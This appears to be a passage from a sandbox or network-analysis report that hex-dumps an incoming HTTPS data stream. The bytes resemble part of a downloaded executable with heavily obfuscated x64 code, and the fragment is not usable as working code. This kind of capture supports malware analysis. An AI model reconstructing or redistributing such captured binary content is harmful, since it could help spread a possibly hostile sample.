d7 3b 6d cf 91 47 21 1a 76 6e 6a 97 36 4c 5f c6 6b 7a 90 41 75 21 ff 9a 0b a3 2e 43 dd d3 de ff 32 2d 1f 6d c7 a2 b2 e3 02 e9
                            Data Ascii: R0Tl`c{&u^\SvL./>-Fl_n|TL/Q;A^Y$f$oa&EMRma:YSSA>.r4P'-?X,\m{=K&SGZhkLV;mG!vnj6L_kzAu!.C2-m
                            2023-05-14 02:51:07 UTC2766INData Raw: 2f 4e 67 ef 66 be ce 57 5e 95 37 ef 4d 92 37 29 d3 96 f7 37 08 74 fd 8f 4a ba b6 28 17 4b 98 bc 15 62 b1 dd 07 7b fe d1 61 ef 6e ed f7 c6 ea e0 03 52 1e fe 9e d0 d1 0c 69 df 43 be 2c c2 7b 46 29 ed c6 8f 7e 3b 56 19 8c 84 14 77 8b aa 0a 3e a3 55 f7 67 c9 08 af 82 32 ca a9 12 f9 c1 d1 25 2a 17 16 81 69 28 18 d1 41 d6 4c d5 5f 96 7a da 43 f9 f4 5f c5 c6 e1 0c d1 ba cf 63 17 e1 73 ee b5 6d ad db 76 3c e8 9f c0 c4 7e 84 4f 72 fb 58 43 fa d7 77 cf e2 ed 1f 40 a2 2a 20 16 56 c8 8c 15 6f 27 4c 6e b7 ce db f0 d5 74 65 49 0e fe 59 af b1 87 67 4d d6 ee 8c 56 92 97 aa 86 c1 fa af 04 6f 56 6e 4f bf 0e 81 c1 3d 8a c9 4c 1a fb 19 fd 7a 03 63 cd d6 5d 9f 4a be 2f 6f 82 6d e8 2b 45 4d 57 5e 45 9e fc 52 92 25 74 c5 44 0d 7a 50 47 dd 97 45 d9 c7 af 81 50 a9 d7 ba b6 c1 e8
                            Data Ascii: /NgfW^7M7)7tJ(Kb{anRiC,{F)~;Vw>Ug2%*i(AL_zC_csmv<~OrXCw@* Vo'LnteIYgMVoVnO=Lzc]J/om+EMW^ER%tDzPGEP
                            2023-05-14 02:51:07 UTC2782INData Raw: 7d 9b ec ef 6f 68 7a b5 ff 91 4d 34 28 06 af 6a 6a c6 db 3f 0d c4 cb df 53 91 98 a4 3b 7a 29 a6 1f cb 4b 60 b1 cb 74 90 a4 59 ef cb 72 d8 d3 70 d5 14 07 54 fd f9 75 37 50 db 45 a0 02 f0 53 e8 8c c7 90 d7 3e 21 fc ad 9a c4 de c0 8d 90 f9 6d 7c 27 87 ae b9 82 31 bf 67 85 2b c2 0d e4 4c a0 ac 59 58 9f 7b 7f dc 52 ca 65 7e da 0b 62 61 3c e3 21 e3 78 f2 06 d1 37 76 d4 fd 85 a0 fe 6b 22 ac 9d c4 5f d1 ba 20 a6 9d 27 86 26 1c bf f4 b1 61 b0 c7 94 ce 96 c8 8a 02 e0 5e 81 75 82 eb a6 7d aa cd 62 3f 4c 4d 09 62 81 57 61 58 7b 08 fa 41 6d d7 72 6d c2 45 7e 11 be 92 98 6c ed 80 cd f7 4c 3b 66 65 03 f6 9b 7a 37 77 21 68 26 43 a3 5f fb 24 24 d0 f1 c2 c4 4e 7e 8e 59 85 98 dc a3 48 19 92 0e 9c dc 8e bf ff 60 f4 51 37 f9 f8 11 57 fc 67 b1 39 dd 1f ac 87 1c 87 61 9a 5c cf
                            Data Ascii: }ohzM4(jj?S;z)K`tYrpTu7PES>!m|'1g+LYX{Re~ba<!x7vk"_ '&a^u}b?LMbWaX{AmrmE~lL;fez7w!h&C_$$N~YH`Q7Wg9a\
                            2023-05-14 02:51:07 UTC2798INData Raw: 86 2b e8 54 f0 87 3f e8 23 66 f2 5d 3c 8a f3 24 6b 1b 74 31 40 f4 24 1b bf 88 44 29 02 c5 41 48 51 ab 6c bd 6c ad 65 95 3d 29 e9 4e af 29 76 da 1d a3 99 b2 df 25 ce 5b cd cc 52 fc fe c3 8f 2f 55 e0 4d 68 8b d6 f5 70 63 c2 4e ea c4 e2 3b ca a3 3a 85 77 ef fe a7 a6 0a 59 44 27 96 8b fa e8 b8 0d 84 bc bd be db 40 80 b9 3f 06 ee 82 fc 54 b4 dd eb 47 2e a5 ec 22 77 b4 35 76 cd 22 cf ad 1d 2d 4c 77 0a cc 2c 51 4a 54 11 10 f9 7b a0 bb c0 f0 ea 29 15 38 5c 7f b0 19 74 b4 90 0d 60 3d 2d 8d e4 8b 60 c8 80 fa c9 a6 97 c6 8c 2d 9c d9 57 88 e4 84 0e 49 6f fb d0 a0 03 61 67 c2 a2 37 3e 09 64 1f 6b bb ce b2 c6 c5 34 a5 cd f1 f3 5b 83 46 c8 97 c3 36 e6 7f 55 62 18 b5 94 35 69 fc c0 4e b3 e0 70 9f 3e 97 3a 45 5b 35 f2 15 4e ef c2 9b d2 06 01 79 f2 fe d6 92 56 fe 00 e9 2c
                            Data Ascii: +T?#f]<$kt1@$D)AHQlle=)N)v%[R/UMhpcN;:wYD'@?TG."w5v"-Lw,QJT{)8\t`=-`-WIoag7>dk4[F6Ub5iNp>:E[5NyV,
                            2023-05-14 02:51:07 UTC2814INData Raw: 05 6f 9f 5b 6d bf e7 82 c0 9a f5 e5 4d 07 ff d9 2d d9 d7 1d 45 c0 5d 9f 5a 3a 71 ea 86 79 74 a1 25 4e 77 5f 0b 3e ce 8a cc c1 34 87 6d 0a db 5a 42 d9 ca 6f cd 3a ad 8f 5e 9a a2 aa 86 84 4c ac 05 6c 66 0f 71 b7 4e 9c 65 c4 ef e1 4f aa ca 49 43 6a 56 67 65 cb e9 8f 22 9a a7 24 85 c0 fc b1 0d 6f 9e 1f 6f 5f c9 90 40 45 1d 05 56 8b fb 69 49 fd 97 0f ed c6 97 8c 53 6a ba a2 86 d7 cb ad 13 6b 65 df 45 af ce f4 41 c5 b4 ee 49 ca 93 79 43 0f d4 66 1d c4 d8 1f d1 fa a7 ee 83 c3 0c 95 15 6f 28 0d 6c 73 c7 96 00 ac 54 e5 c7 09 fa 69 5d f1 d7 4c 67 47 f8 8b 50 da 97 ba 86 62 ed ac 55 62 63 1f 00 9f ce 06 c3 c4 44 85 78 aa 4c 19 43 5d d2 65 cd f7 fd 8f c4 3b a7 0a 88 c5 2c ab d3 2f 5e 5d 6e 4f dc 9a c0 23 34 e5 11 0d f9 19 03 92 57 6c 4c c6 75 87 56 3a cd 8a 86 11 6f
                            Data Ascii: o[mM-E]Z:qyt%Nw_>4mZBo:^LlfqNeOICjVge"$oo_@EViISjkeEAIyCfo(lsTi]LgGPbUbcDxLC]e;,/^]nO#4WlLuV:o
                            2023-05-14 02:51:07 UTC2830INData Raw: 0a 6b 67 d4 6f ab c9 2c cc 35 ed d4 0d 2d f8 3d 79 b8 fc 77 cc 56 d0 88 52 1e a2 a8 86 8e ac 2d 0d 7c 65 57 4f 9f ce d2 a1 f1 69 fd 39 0e ab c8 55 c1 55 69 cd ae e0 8b 52 ce 05 a8 95 c3 58 b6 d5 d6 27 18 6f a2 cf e6 c4 15 ed 27 28 27 5b 65 79 f9 57 58 dd c6 b9 8b 5c 98 3f ba 26 c2 ed a2 16 55 13 b4 87 bf c6 d8 c7 c5 78 e0 4f 0a cc d8 c2 f0 d6 5d 0b cf cb 6a d2 58 67 ef da c7 54 ad d6 6e 67 bb 66 b8 82 9a e0 45 f5 e4 4d 06 f9 b4 6f 55 7d 14 4e 88 e4 b5 50 52 57 0b b5 42 e2 ac 17 6d ef 27 cf 3c 67 9a 66 ff b8 6c 7d cd e4 5c 43 07 47 5c cd 86 e2 da 56 22 24 d1 82 bb ba 45 dc cf 00 da 66 bb b4 8e 90 d1 fa e5 25 20 e8 b1 53 dc 96 f3 0c c2 ef f8 d2 ab 47 b1 8a 95 64 ae 11 5f 67 3f b7 3f 40 9b e6 d6 9c 09 e9 f9 7a 52 40 c3 d0 af d9 ce b0 0b b2 3b c8 d2 c6 a7 4c
                            Data Ascii: kgo,5-=ywVR-|eWOi9UUiRX'o'('[eyWX\?&UxO]jXgTngfEMoU}NPRWBm'<gfl}\CG\V"$Ef% SGd_g??@zR@;L
                            2023-05-14 02:51:07 UTC2846INData Raw: b2 ee 71 d9 3b b7 da 52 b7 93 5e 67 4d c2 bc 39 29 b1 d7 09 2b 7a 68 c6 d3 34 bb 1c f5 f1 a4 ad 75 49 27 4e 53 d6 43 39 c0 29 5c 86 85 0b 82 51 0b 7c fc 57 73 86 35 4a 52 b6 c6 59 e0 ef 15 ac 05 0b 63 7f 3d b8 e0 16 4b c5 60 77 49 8a 65 3d 04 6b d5 a6 ca c6 c5 15 17 23 91 da 26 45 79 f6 64 c5 24 d6 ff b1 0a 3b 93 03 b9 7d 71 0a 43 d6 2c b9 41 fd cd c6 c8 83 0e bf 00 fa 3a c6 6c d1 d8 12 6b 80 ed 1b dd 98 c0 c5 30 fc 45 0d fa 85 7a f2 7d 6d ce ee a6 8e d2 2f 66 a8 96 44 22 dc eb 28 97 5e 43 31 43 43 36 e1 74 aa 4d eb dd d9 48 c7 14 73 77 b6 43 13 57 b3 a7 7d 86 e7 2f 36 81 ee 0c 4f ef e4 3f bd 1e 47 0c b5 3b c8 ff 59 d7 b8 9b 63 11 e6 e0 56 e3 ba a7 d2 ea e8 0f c4 dd 77 3b 5e 58 17 1d e4 f2 03 3d e4 8e 29 3b 43 0d 59 5f 6b b4 26 79 8e 02 ea 3b 6b b7 cc 0d
                            Data Ascii: q;R^gM9)+zh4uI'NSC9)\Q|Ws5JRYc=K`wIe=k#&Eyd$;}qC,A:lk0Ez}m/fD"(^C1CC6tMHswCW}/6O?G;YcVw;^X=);CY_k&y;k
                            2023-05-14 02:51:07 UTC2862INData Raw: de c4 c1 6f 62 20 68 ab 13 e6 92 5c ae 9d b5 a5 9c 62 69 9e a6 cd 4b b6 69 3a 61 72 e5 cb 4b 55 aa ec cd 1e ac 04 68 4b 22 4f da 4a 06 81 5d 78 a1 71 73 9c ee 8e 7b 56 30 b1 00 55 67 2a d6 5d e6 36 01 a6 8a 36 b8 76 2b 4e 30 1d bb 83 5f 60 4a 42 21 1a ee 4d 8b 70 b5 31 3e 43 65 9e 4b 54 66 67 69 a6 0c 7e e1 6a 45 4a ac 2c be 01 34 2a aa 72 b1 92 22 2d 6b 76 50 b0 01 33 68 46 ca 29 a6 e4 83 96 a6 34 68 a6 d4 ce 89 16 ae 69 aa b8 90 34 11 9e 2e 0c 61 76 f1 09 11 53 95 cb e2 d5 e8 ec 41 a2 46 b4 62 6d 68 46 da 9c 1d 4b 5d be a2 71 71 5b 1c ed 4a ee 30 6a f1 4d 25 77 0a 5e 7f 65 c1 a2 94 04 78 eb f5 0e d2 3c a8 87 5d 96 80 72 5e aa 2d 41 43 7a b1 7d 41 53 af 48 cb 95 f3 fc 01 e6 8c c2 6b 6a 63 58 ca dc ee 81 51 cc a6 d0 61 86 2e c5 cb 76 95 d3 0d 57 67 32 8a
                            Data Ascii: ob h\biKi:arKUhK"OJ]xqs{V0Ug*]66v+N0_`JB!Mp1>CeKTfgi~jEJ,4*r"-kvP3hF)4hi4.avSAFbmhFK]qq[J0jM%w^ex<]r^-ACz}ASHkjcXQa.vWg2
                            2023-05-14 02:51:07 UTC2878INData Raw: e6 d4 c5 a2 ec 1c 78 6b 3b cf d3 9c cf ed 5c 20 0f 32 71 2e 2d 57 97 a2 b3 31 9e d2 65 8a c1 35 e5 8c 81 a6 f6 37 69 ab 32 1e d5 14 69 97 5d c8 a9 76 71 d7 4e 4d 2b 74 b3 e1 15 5b 65 fa 0a 5c a6 e1 c5 c6 a1 24 68 7f 22 4d b2 17 a6 41 3c 80 a0 5a 72 91 ae 55 5b 76 6f 71 01 53 63 4c ca 6d c6 e4 2e 27 8c 94 67 0b 23 5e 36 9c a2 83 5c a0 be e2 72 7e ae 4d ab 3e bf f9 20 93 6c 5a 5e 56 d1 ed c5 a6 fd 34 7a 68 22 0e 62 00 7e c5 7d a1 a3 73 51 92 2a 4d 22 16 b1 32 00 b3 6a 4e ca 17 86 e4 69 97 8b 20 ca 52 53 c5 53 1b 96 da 5d 80 67 01 f1 88 af c5 ab 7f b9 b1 33 b9 65 43 c8 4b e6 f9 d1 26 a1 e1 e9 67 2b 44 1e 3c 8e 81 3b 0e a3 55 79 ba 2e 17 0b 76 b1 55 06 55 c5 42 8f 14 e6 96 c3 a7 4c 7d 40 9b a3 ce d2 c8 ab 83 dd 94 90 72 d9 9f 2f 75 99 6b e1 70 61 53 f5 48 c8
                            Data Ascii: xk;\ 2q.-W1e57i2i]vqNM+t[e\$h"MA<ZrU[voqScLm.'g#^6\r~M> lZ^V4zh"b~}sQ*M"2jNi RSS]g3eCK&g+D<;Uy.vUUBL}@r/ukpaSH
                            2023-05-14 02:51:07 UTC2894INData Raw: 20 a4 c3 dd 74 3c c5 90 0e 17 ce ec e2 33 96 eb 24 cc 3a fd 83 00 b4 e8 5f e5 d6 42 48 dc 4d 1a 1e 90 73 a4 a9 81 1b 09 6c 3a db 06 b2 5e 95 2e af 1f b2 b9 c2 20 a5 0a e4 97 f8 5c d2 e6 49 29 da 53 b1 0e 70 90 c9 77 10 b0 04 65 07 d8 95 f3 0b e4 79 3b dc 6c af 5a 6d da 63 bc c0 3e 3f 28 47 28 c1 2b 1a 85 67 b0 dd e2 9b 82 31 e0 e4 02 42 be 45 1d 33 5e 69 d9 5d 0c 92 a5 b0 46 c3 b3 06 76 34 f8 3c b0 e9 fe 86 f6 6d bf 78 fd a8 a8 1e 0b 20 e6 57 3d 8a 4b 05 0f 4e c6 c4 87 b9 e5 b9 98 67 79 38 19 f9 db 47 70 32 60 12 06 4b 68 5c 62 83 d5 db f4 9a 0b 54 29 6d 4b 39 5c 5c c3 80 5b 3f e5 db 3e f1 c2 c9 da 8c 00 17 dd aa 84 4e 5d c9 94 8a 3a cf 6d 8f 13 f2 f1 3d ce b3 44 89 ff 17 e1 a9 8d 97 a1 6d 52 68 dd 51 3f e3 71 d9 5f cd a6 18 64 9d 2d 8c 55 44 5f fa 27 fd
                            Data Ascii: t<3$:_BHMsl:^. \I)Spwey;lZmc>?(G(+g1BE3^i]Fv4<mx W=KNgy8Gp2`Kh\bT)mK9\\[?>N]:m=DmRhQ?q_d-UD_'
                            2023-05-14 02:51:07 UTC2910INData Raw: af 1a 7c 96 5b f0 e8 d1 f5 91 6d 9b 61 37 d4 99 61 ee fe 1b d9 bf 6a 69 13 c7 f1 67 6b 83 8b f9 fb de f9 ae 7f b6 b4 72 4a 1c 2a 12 12 07 b8 ef 4b 93 11 67 4c d8 ad 91 21 01 8a 79 0b ee 5c 53 7e bc 85 7a 12 4a 05 5c 7f 66 d0 1a 03 1a c7 82 07 fb 32 51 cf 79 e8 8a da 92 ad 86 54 c7 2b a0 53 7e 26 6f 56 83 cd b0 1b b9 b9 00 03 0d 1c 05 6b 45 b0 9f c3 12 cc 9d 74 5d c4 63 03 cc 5c 0c ef 19 5a 85 eb 2d fd b5 4d 3b 3a 87 f7 31 1a be 8b cb 87 a9 d8 b1 5b e9 f1 5d 8f 39 63 d3 c2 fe 4e f9 00 18 69 89 1b 1f 01 6a 76 54 58 d1 24 5b 5d 5f 4b 4d d9 d2 86 2d a8 6e 89 fc 89 41 6f b4 a4 6c a3 1f ec 8a d8 28 4f c8 a0 5c 88 be e9 9e a8 2f 03 a6 90 3c 30 4f 5a 1d ed 41 78 a9 a7 6f 14 88 b4 db 48 89 8d 87 c7 ee fa a1 02 d1 3a a3 d9 7c c5 a3 98 bc 6b eb 2a 12 b3 1a e7 a2 6e
                            Data Ascii: |[ma7ajigkrJ*KgL!y\S~zJ\f2QyT+S~&oVkEt]c\Z-M;:1[]9cNijvTX$[]_KM-nAol(O\/<0OZAxoH:|k*n
                            2023-05-14 02:51:07 UTC2926INData Raw: 08 1b ce 1d 55 6b 85 da 71 b2 33 bf da 16 e6 7d 40 06 11 2b 8e e7 eb 26 d3 07 d9 79 74 b8 ed c7 0c 80 41 ae 16 e4 64 4c dc 9f bf 7b 93 29 b5 9d 0e 2f 11 a1 da 40 c9 0a cd 36 03 4a 8a 9e 38 9a 79 d1 25 de 65 b4 c8 19 cd 5a 0b d5 08 1f 0a 9a 55 9a ac 65 55 f2 bc c1 6c f4 51 43 16 8c 0a 71 40 41 52 81 dd 89 2d 31 c2 02 ff b5 f7 b5 90 02 29 c8 88 5d 11 d7 22 1e e5 f8 c6 06 90 ed 0c cc df 95 c8 b9 ea 20 e1 36 1d 3c 04 71 1f 2b 29 9a 9c aa a1 58 c2 67 72 05 bd 86 5f a8 96 9c 47 e8 d9 91 27 db 6c 06 f7 e0 f1 79 2d 47 40 a9 ff a3 c2 26 a0 35 06 fe 5e a7 6c 8b 2e ed b8 23 60 a0 1b 03 77 eb b9 f8 2a 5d 35 be 13 ac e4 49 5d ab 3b 0e 16 dc 3e 14 a8 6d 4d 43 99 00 8b 2b 23 c7 10 ba 2d 88 de b1 af b0 13 b8 b6 af 8f ef 85 80 3a 90 57 54 fa 26 af 74 48 f9 e9 fa cd 5c 10
                            Data Ascii: Ukq3}@+&ytAdL{)/@6J8y%eZUeUlQCq@AR-1)]" 6<q+)Xgr_G'ly-G@&5^l.#`w*]5I];>mMC+#-:WT&tH\
                            2023-05-14 02:51:07 UTC2942INData Raw: 4b 4f 76 e9 e9 ab 09 5d 43 93 c9 13 1a df 0b 7f 8a 7c c5 a6 ce e4 3b 73 bd cc c1 3d 5e d6 7e ee 61 86 88 0c 37 02 ca fc 5f 40 7d 27 4b 14 04 7c 56 5e 25 83 78 61 88 d5 53 d0 21 7f fb 5e cf 6b 64 f2 48 6e 5c 73 f0 eb aa f4 25 7a e0 69 7e 52 4b f4 b6 37 9f 82 3c c1 58 fd b1 63 71 ee f3 df 76 80 24 db a1 ed 8c d0 0a 51 4e be 42 dd 3b cc 3d 19 5d 73 cf 83 95 87 85 a4 60 a9 0e d3 41 4d 3f 50 14 8b 71 82 3b 6d 59 d0 c3 06 e2 d3 4a 24 a0 3c 2c 31 09 33 4c c0 3e 06 cc a6 10 4f a9 73 c6 d6 01 b1 00 c1 37 73 bf 62 b8 58 0a f3 88 c2 79 29 30 2a a3 84 2a 01 fd 86 76 aa 9f ad ee 8e 5a 69 26 00 b9 95 ee 43 89 d6 7a 2d 7c 5b 5e 3d 6e c3 ac a7 e1 83 9c 75 4e 22 9a 1d f2 97 82 46 3e 6f b0 63 fb be f9 72 48 cc 41 72 71 1a 24 2b b2 ce 28 f5 b4 0f 62 7f f9 e7 98 ee d5 a1 dd
                            Data Ascii: KOv]C|;s=^~a7_@}'K|V^%xaS!^kdHn\s%zi~RK7<Xcqv$QNB;=]s`AM?Pq;mYJ$<,13L>Os7sbXy)0**vZi&Cz-|[^=nuN"F>ocrHArq$+(b
                            2023-05-14 02:51:07 UTC2958INData Raw: 1b f8 35 df 33 a8 a9 f0 dd f3 a3 36 5a 3d 07 db 5c 08 90 85 c3 f9 0a e2 0d 8d 00 e4 58 e6 03 6e 87 18 00 35 74 8a 09 73 cf f2 0d a6 52 25 96 9f dc dd 30 20 02 69 04 4f 2d be d0 6a 70 e0 09 76 32 85 c0 b7 7f 51 ff 92 13 c2 93 fc d9 ac 5f aa 84 77 25 c6 1c 70 e9 1a 95 f5 20 9e e7 f6 a7 44 70 3a c4 9d b6 a9 dc 6c d8 d7 92 cc 6a c8 5a 9c ca b2 48 75 1b c8 9a 0e c4 90 89 8d 03 f2 12 58 99 cb 3e b9 6b 8d b5 98 ce cb 87 2a 4d ea 5c 57 46 5f 7e 71 91 f9 89 48 17 cd bc 01 14 57 34 a1 2a 53 cd b7 01 4a 2c 26 98 77 b6 21 04 bc 41 b9 13 40 40 74 c1 cc 2c 8d 55 02 40 0e 7d f2 0e ee a9 5c 01 82 f0 68 89 e7 51 b2 99 5d 8c b7 4c a2 cc e2 ef bd bd 67 1e 91 58 64 41 7d 0c e3 58 cb 86 4e b3 bd 38 36 e4 2d 9b 5f 20 97 38 e6 15 a8 f3 5c fe 4b 88 b0 6c 95 7f 1c 74 fd 42 93 8e
                            Data Ascii: 536Z=\Xn5tsR%0 iO-jpv2Q_w%p Dp:ljZHuX>k*M\WF_~qHW4*SJ,&w!A@@t,U@}\hQ]LgXdA}XN86-_ 8\KltB
                            2023-05-14 02:51:07 UTC2974INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:
                            2023-05-14 02:51:07 UTC2990INData Raw: d0 c3 13 00 10 16 04 00 57 16 04 00 d8 c3 13 00 a0 16 04 00 62 17 04 00 ec c3 13 00 70 17 04 00 04 18 04 00 f4 c3 13 00 30 18 04 00 bc 18 04 00 cc c1 13 00 c0 18 04 00 c7 19 04 00 74 c2 13 00 d0 19 04 00 09 1a 04 00 8c c2 13 00 10 1a 04 00 5e 1a 04 00 b0 c1 13 00 60 1a 04 00 29 1b 04 00 b8 c1 13 00 30 1b 04 00 5c 1e 04 00 48 c2 13 00 60 1e 04 00 3b 1f 04 00 fc c1 13 00 40 1f 04 00 63 1f 04 00 14 c2 13 00 63 1f 04 00 c3 1f 04 00 24 c2 13 00 c3 1f 04 00 32 20 04 00 38 c2 13 00 40 20 04 00 50 21 04 00 e0 c1 13 00 50 21 04 00 a2 21 04 00 d8 c1 13 00 b0 21 04 00 65 22 04 00 60 c2 13 00 70 22 04 00 1f 23 04 00 e0 c3 13 00 20 23 04 00 a1 23 04 00 fc c3 13 00 b0 23 04 00 da 23 04 00 a8 c1 13 00 e0 23 04 00 3d 24 04 00 a0 c1 13 00 40 24 04 00 8b 24 04 00 98 c1 13
                            Data Ascii: Wbp0t^`)0\H`;@cc$2 8@ P!P!!!e"`p"# #####=$@$$
                            2023-05-14 02:51:07 UTC3006INData Raw: 68 cc 08 00 87 cc 08 00 50 1c 14 00 88 cc 08 00 d5 cc 08 00 48 1c 14 00 d8 cc 08 00 f1 cc 08 00 24 1c 14 00 f4 cc 08 00 b3 cd 08 00 2c 1c 14 00 b4 cd 08 00 01 ce 08 00 3c 1c 14 00 04 ce 08 00 4b ce 08 00 14 1c 14 00 4c ce 08 00 6e ce 08 00 1c 1c 14 00 80 ce 08 00 98 ce 08 00 78 1c 14 00 a0 ce 08 00 a1 ce 08 00 7c 1c 14 00 b0 ce 08 00 b1 ce 08 00 80 1c 14 00 34 cf 08 00 8f cf 08 00 84 1c 14 00 90 cf 08 00 c2 cf 08 00 90 1c 14 00 e0 cf 08 00 17 d0 08 00 98 1c 14 00 34 d0 08 00 74 d0 08 00 08 22 14 00 8c d0 08 00 cc d0 08 00 18 22 14 00 cc d0 08 00 3e d1 08 00 c8 22 14 00 40 d1 08 00 80 d1 08 00 10 22 14 00 80 d1 08 00 f2 d1 08 00 d8 22 14 00 24 d2 08 00 86 d2 08 00 94 22 14 00 88 d2 08 00 ea d2 08 00 ac 22 14 00 ec d2 08 00 4e d3 08 00 7c 22 14 00 50 d3 08
                            Data Ascii: hPH$,<KLnx|44t"">"@""$""N|"P
                            2023-05-14 02:51:07 UTC3022INData Raw: 71 de 0d 00 28 6c 14 00 74 de 0d 00 e5 de 0d 00 3c 6c 14 00 e8 de 0d 00 28 df 0d 00 50 6c 14 00 28 df 0d 00 5b df 0d 00 58 6c 14 00 5c df 0d 00 ab df 0d 00 60 6c 14 00 ac df 0d 00 ee df 0d 00 8c 6c 14 00 f0 df 0d 00 5d e0 0d 00 94 6c 14 00 60 e0 0d 00 8e e0 0d 00 a0 6c 14 00 90 e0 0d 00 be e0 0d 00 b0 6c 14 00 c0 e0 0d 00 1a e2 0d 00 a8 6c 14 00 1c e2 0d 00 94 e2 0d 00 b8 6c 14 00 94 e2 0d 00 c5 e2 0d 00 08 6b 14 00 c8 e2 0d 00 8e e3 0d 00 c0 6c 14 00 90 e3 0d 00 d1 e3 0d 00 10 6b 14 00 d4 e3 0d 00 85 e4 0d 00 88 6d 14 00 88 e4 0d 00 c8 e4 0d 00 b4 6d 14 00 e4 e4 0d 00 d1 e5 0d 00 f0 6d 14 00 d4 e5 0d 00 e0 e6 0d 00 0c 6e 14 00 e0 e6 0d 00 1b e7 0d 00 bc 6d 14 00 1c e7 0d 00 5c e7 0d 00 e4 6d 14 00 5c e7 0d 00 da e8 0d 00 24 6e 14 00 e4 e8 0d 00 56 e9 0d
                            Data Ascii: q(lt<l(Pl([Xl\`ll]l`llllklkmmmnm\m\$nV
                            2023-05-14 02:51:07 UTC3038INData Raw: 0b fe ff e8 1c 6d 00 00 1b 68 9a 0b fe ff e8 11 6d 00 00 6d 68 4c 0b fe ff e8 06 6d 00 00 84 68 2d 0b fe ff e8 fb 6c 00 00 61 68 d0 0a fe ff e8 f0 6c 00 00 cf 68 8b 0a fe ff e8 e5 6c 00 00 62 68 54 0a fe ff e8 da 6c 00 00 26 68 06 0a fe ff e8 cf 6c 00 00 12 68 b8 09 fe ff e8 c4 6c 00 00 1c 68 99 09 fe ff e8 b9 6c 00 00 70 68 3d 09 fe ff e8 ae 6c 00 00 c2 68 23 09 fe ff e8 a3 6c 00 00 72 68 bf 08 fe ff e8 98 6c 00 00 4c 68 0f 08 fe ff e8 8d 6c 00 00 1c 68 ed 07 fe ff e8 82 6c 00 00 68 68 ce 07 fe ff e8 77 6c 00 00 92 68 a7 07 fe ff e8 6c 6c 00 00 25 68 6d 07 fe ff e8 61 6c 00 00 72 68 3a 07 fe ff e8 56 6c 00 00 dd 68 9a 06 fe ff e8 4b 6c 00 00 52 68 35 06 fe ff e8 40 6c 00 00 7c 68 02 06 fe ff e8 35 6c 00 00 62 68 6f 05 fe ff e8 2a 6c 00 00 7f 68 17 01 fe
                            Data Ascii: mhmmhLmh-lahlhlbhTl&hlhlhlph=lh#lrhlLhlhlhhwlhll%hmalrh:VlhKlRh5@l|h5lbho*lh
                            2023-05-14 02:51:07 UTC3054INData Raw: 19 f6 80 48 8d 64 24 08 e9 05 00 00 00 b0 ad 22 b7 15 9d e9 03 00 00 00 e9 ed e5 9c f9 eb 05 2c 80 f6 3c eb 72 07 3e 50 8f f1 1d f5 5c e8 05 00 00 00 37 aa 12 59 33 48 83 04 24 1f f9 e9 05 00 00 00 58 c2 65 cc 7a 72 04 4b 5a dd 6c c3 cb 34 c1 9d e9 05 00 00 00 6b db 70 18 f1 e9 04 00 00 00 7f fa 98 96 0f 86 05 f3 ff ff 48 83 c7 04 48 8b ec 48 83 c5 68 e9 02 00 00 00 25 7d 48 8d 64 24 f8 e9 04 00 00 00 a1 f8 35 52 48 89 04 24 9f eb 06 c0 41 58 c6 32 24 e9 07 00 00 00 c0 27 9f 63 47 d3 5f e8 07 00 00 00 57 86 37 2f 4f ea 74 48 8d 64 24 08 9e 58 eb 07 e5 a3 9e ad ca 97 5e 48 89 7d 00 e9 02 00 00 00 15 de 9c eb 06 bc 63 ce ec b3 30 e9 06 00 00 00 2e 51 2f 62 54 60 e8 03 00 00 00 a8 44 82 48 83 04 24 16 f8 73 03 28 88 f2 c3 61 4e f3 67 53 2c 7f e9 03 00 00 00
                            Data Ascii: Hd$",<r>P\7Y3H$XezrKZl4kpHHHh%}Hd$5RH$AX2$'cG_W7/OtHd$X^H}c0.Q/bT`DH$s(aNgS,
                            2023-05-14 02:51:07 UTC3070INData Raw: 48 ff c4 48 ff c4 f9 eb 03 65 2c df 72 05 a2 c9 6d 5c 31 eb 06 f7 99 2e 5a 50 ad e9 02 00 00 00 ee fd 9e 48 8b 04 24 eb 06 26 c8 ee 67 9f 62 48 8d 64 24 08 e9 06 00 00 00 4a 87 cf bc ef 4c eb 02 84 29 48 33 db 8b 1a 48 2b cb 48 ff c7 48 8d 64 24 f8 eb 06 19 64 c6 9e 94 d2 48 89 04 24 eb 05 27 75 fa 65 56 9f f9 eb 06 a6 f8 57 31 48 fb 72 07 ca 2e de df d6 83 a4 e8 02 00 00 00 22 7b 48 ff c4 38 f6 74 07 35 51 d9 a7 8a 36 6e 48 ff c4 38 f6 74 04 93 3d 9c 4f 48 ff c4 f8 73 06 9b 2a 53 77 94 4c 48 ff c4 eb 04 a4 6e fa c9 48 ff c4 38 ff eb 07 cc f1 aa af d3 fc 82 74 03 64 71 ed 48 ff c4 f8 73 05 e1 99 f0 88 59 48 ff c4 f9 eb 07 bb b0 e9 5b c7 c3 5c 72 04 9e 5e dd 4b 48 ff c4 38 ff e9 07 00 00 00 a3 89 c4 27 93 65 2f 74 07 66 86 18 c6 9c df 2e eb 04 e9 89 9c a4
                            Data Ascii: HHe,rm\1.ZPH$&gbHd$JL)H3H+HHd$dH$'ueVW1Hr."{H8t5Q6nH8t=OHs*SwLHnH8tdqHsYH[\r^KH8'e/tf.
